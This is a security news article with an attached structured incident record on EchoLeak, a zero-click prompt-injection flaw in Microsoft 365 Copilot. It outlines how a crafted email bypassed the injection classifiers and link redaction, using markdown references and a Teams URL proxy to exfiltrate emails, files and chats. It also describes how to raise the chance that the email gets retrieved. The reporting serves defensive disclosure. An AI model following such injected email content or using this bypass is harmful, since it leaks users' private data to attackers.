Microsoft Patches Critical Zero-Click Flaw in Microsoft 365 Copilot
Microsoft has addressed a severe "zero-click" vulnerability in its Microsoft 365 Copilot AI tool, tracked as CVE-2025-32711 (CVSS 9.3), which could have enabled attackers to exfiltrate sensitive data without user interaction. Discovered by Aim Security and dubbed "EchoLeak," the flaw allowed unauthorized access to a victim’s Outlook emails, OneDrive files, SharePoint sites, and Microsoft Teams chat history via a specially crafted email.
The exploit bypassed multiple security layers, including Copilot’s cross-prompt injection attack (XPIA) classifiers and link redaction protections, by leveraging markdown references and a Microsoft Teams URL proxy endpoint to transmit stolen data to an attacker-controlled server. Unlike traditional phishing attacks, this method did not require the victim to click a malicious link—simply referencing the attacker’s email in a Copilot query could trigger the data leak.
Aim Security demonstrated that attackers could increase the likelihood of exploitation by sending multiple emails on varied topics or a single long, segmented email covering subjects likely to be queried by the victim. While Microsoft confirmed the flaw had not been exploited in the wild, security experts warn that similar vulnerabilities may exist in other retrieval-augmented generation (RAG)-based AI tools, highlighting a broader risk in AI assistant architectures.
The patch resolves the issue, requiring no further user action. However, the incident underscores the need for runtime guardrails, stricter input scoping, and clear separation between trusted and untrusted data in AI systems.
TPRM report: https://www.rankiteo.com/company/aim-security
"id": "aim1765254813",
"linkid": "aim-security",
"type": "Vulnerability",
"date": "6/2025",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'industry': 'Software/Cloud Services',
'name': 'Microsoft',
'type': 'Technology Company'}],
'attack_vector': 'Specially crafted email',
'data_breach': {'data_exfiltration': 'Yes (via crafted GET requests to '
'attacker-controlled server)',
'personally_identifiable_information': 'Yes',
'sensitivity_of_data': 'High (personally identifiable and '
'corporate-sensitive information)',
'type_of_data_compromised': ['Outlook emails',
'OneDrive files',
'Office documents',
'SharePoint data',
'Microsoft Teams chat history']},
'description': "Microsoft patched a 'zero-click' flaw in its Microsoft 365 "
'Copilot retrieval-augmented generation (RAG) tool that could '
'have allowed for exfiltration of sensitive data. The '
'vulnerability, tracked as CVE-2025-32711, would have allowed '
'an attacker to extract potentially sensitive information from '
'a user’s connected Microsoft 365 services by sending a '
'specially crafted email.',
'impact': {'data_compromised': 'Sensitive information from Outlook email, '
'OneDrive storage, Office files, SharePoint '
'sites, and Microsoft Teams chat history',
'identity_theft_risk': 'High',
'systems_affected': 'Microsoft 365 Copilot, Microsoft 365 services '
'(Outlook, OneDrive, Office, SharePoint, '
'Teams)'},
'initial_access_broker': {'entry_point': 'Specially crafted email to '
'Microsoft 365 Copilot'},
'investigation_status': 'Patched (no active exploitation reported)',
'lessons_learned': 'The incident highlights risks in RAG-based AI agents '
'processing untrusted inputs alongside internal data, '
'necessitating runtime guardrails, stricter input scoping, '
'and separation between trusted and untrusted content.',
'post_incident_analysis': {'corrective_actions': ['Microsoft patched '
'CVE-2025-32711',
'Organizations advised to '
'implement runtime '
'guardrails and DLP '
'measures'],
'root_causes': ['LLM Scope Violation in Microsoft '
'365 Copilot',
'Bypass of cross-prompt injection '
'attack (XPIA) classifiers',
'Exploitation of Microsoft Teams '
'URL format to bypass CSP '
'guardrails']},
'recommendations': ['Disable external email ingestion by RAG tools like '
'Copilot',
'Enforce data loss prevention (DLP) tags to flag requests '
'involving sensitive information',
'Apply prompt-level filters to block suspicious links and '
'structured outputs'],
'references': [{'source': 'Aim Security'},
{'source': 'SC Media'},
{'source': 'SOCRadar (Ensar Seker)'},
{'source': 'Microsoft Disclosure (CVE-2025-32711)'},
{'source': 'Teams Developer Tech Community (Microsoft employee '
'comment)'}],
'response': {'containment_measures': 'Patch released by Microsoft (no further '
'user action required)',
'remediation_measures': 'Microsoft patched the vulnerability '
'(CVE-2025-32711)',
'third_party_assistance': 'Aim Security (discovery and '
'proof-of-concept)'},
'title': 'EchoLeak: Zero-Click Flaw in Microsoft 365 Copilot',
'type': 'AI Command Injection',
'vulnerability_exploited': 'CVE-2025-32711 (CVSS 9.3)'}